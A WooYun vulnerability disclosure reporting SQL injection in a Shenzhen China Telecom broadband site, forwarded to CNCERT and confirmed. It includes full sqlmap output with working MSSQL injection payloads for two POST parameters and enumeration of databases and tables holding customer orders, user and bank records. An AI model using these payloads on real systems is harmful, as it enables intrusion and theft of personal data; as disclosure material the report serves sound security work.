当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0191945

漏洞标题:中国电信某市电信某站存在漏洞(泄露大量用户个人信息、订单信息、银行卡信息等)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2016-04-03 15:00

修复时间:2016-05-21 14:10

公开时间:2016-05-21 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

大量敏感信息泄漏!~~~包括帐号、身份证、个人信息、银行信息、订单信息、企业信息等等!~~~

详细说明:

深圳市电信宽带受理中心
多处注入
注入点:

http://**.**.**.**/up/?login=yes (POST)
name=111&zjid=2222&Submit=%B5%C7%C2%BC
%B2%E9%D1%AF


name和zjid均存在注入

sqlmap identified the following injection points with a total of 155 HTTP(s) req
uests:
---
Place: POST
Parameter: zjid
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: name=111&zjid=-1221' OR 8367=CONVERT(INT,(SELECT CHAR(113)+CHAR(111
)+CHAR(118)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (8367=8367) THEN CHAR(49) ELS
E CHAR(48) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'BQDy'=
'BQDy&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: name=111&zjid=2222' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(66)+CHAR(70)+CH
AR(112)+CHAR(72)+CHAR(120)+CHAR(104)+CHAR(89)+CHAR(90)+CHAR(71)+CHAR(88)+CHAR(11
3)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL-- &Submit=%B5%C7%C2%BC%B2%E9%D1%AF
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: name=111&zjid=2222'; WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2
%E9%D1%AF
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: name=111&zjid=2222' WAITFOR DELAY '0:0:5'--&Submit=%B5%C7%C2%BC%B2%
E9%D1%AF
Place: POST
Parameter: name
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: name=-6638' OR 3817=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(11
8)+CHAR(103)+CHAR(113)+(SELECT (CASE WHEN (3817=3817) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(108)+CHAR(103)+CHAR(101)+CHAR(113))) AND 'bWIg'='bWIg&zji
d=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
    Type: UNION query
    Title: Generic UNION query (NULL) - 51 columns
    Payload: name=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
CHAR(113)+CHAR(111)+CHAR(118)+CHAR(103)+CHAR(113)+CHAR(116)+CHAR(71)+CHAR(81)+CH
AR(65)+CHAR(104)+CHAR(103)+CHAR(105)+CHAR(86)+CHAR(110)+CHAR(86)+CHAR(113)+CHAR(
108)+CHAR(103)+CHAR(101)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL-- &zjid=2222&Submit=%B5%C7%C2%BC%B2%E9%D1%AF
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: name=111'; WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2
%E9%D1%AF
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: name=111' WAITFOR DELAY '0:0:5'--&zjid=2222&Submit=%B5%C7%C2%BC%B2%
E9%D1%AF
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: name, type: Single quoted string (default)
[1] place: POST, parameter: zjid, type: Single quoted string
[q] Quit
> 0
[04:16:35] [INFO] testing Microsoft SQL Server
[04:16:35] [INFO] confirming Microsoft SQL Server
[04:16:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP
back-end DBMS: Microsoft SQL Server 2008
[04:16:38] [INFO] fetching current user
current user:    'hds0270595'
[04:16:39] [INFO] fetching current database
current database:    'hds0270595_db'
[04:16:40] [INFO] testing if current user is DBA
current user is DBA:    False
database management system users [2]:
[*] hds0270595
[*] sa_hds027adm
available databases [3]:
[*] hds0270595_db
[*] master
[*] tempdb
Database: hds0270595_db
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| dbo.dingdan       | 77035   |		订单
| dbo.dxyonghu      | 40942   |		电信用户
| dbo.tvdingdan     | 18960   |		tv订单
| dbo.xsdingdan     | 15531   |		学生订单
| dbo.dkjl          | 13307   |		打款记录
| dbo.quyu          | 8813    |		区域
| dbo.cdma          | 7063    |		cdma
| dbo.tvyonghu      | 5844    |		tv用户
| dbo.qydingdan     | 1721    |		企业订单
| dbo.zhangbu       | 1080    |		账簿
| dbo.zhdingdan     | 1043    |		?订单
| dbo.yybb          | 1031    |		
| dbo.xydingdan     | 943     |		信用订单?
| dbo.rizi          | 908     |		日子
| dbo.bankmx        | 771     |		银行明细
| dbo.telbook       | 605     |		电话簿
| dbo.caigou        | 210     |		采购
| dbo.mingxi        | 174     |		明细
| dbo.dxtaocan      | 128     |		电信套餐
| dbo.wcdma         | 87      |		wcdma
| dbo.taocan        | 78      |		套餐
| dbo.tvtaocan      | 64      |		tv套餐
| dbo.yuangong      | 48      |		员工
| dbo.chanpin       | 43      |
| dbo.dxwapchanping | 33      |
| dbo.dxwapchanping | 33      |
| dbo.caidan        | 32      |
| dbo.tvdz          | 21      |		
| dbo.tvwapchanping | 13      |
| dbo.tvwapchanping | 13      |
| dbo.modem         | 10      |
| dbo.dls           | 4       |		代理商?
| dbo.ywqx          | 4       |		
| dbo.zu_yuangong   | 3       |		组员工?
| dbo.config        | 1       |
+-------------------+---------+


101.jpg


102.jpg


103.jpg


104.jpg


105.jpg


106.jpg


107.jpg


108.jpg


109.jpg


110.jpg


111.jpg


漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-06 14:05

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无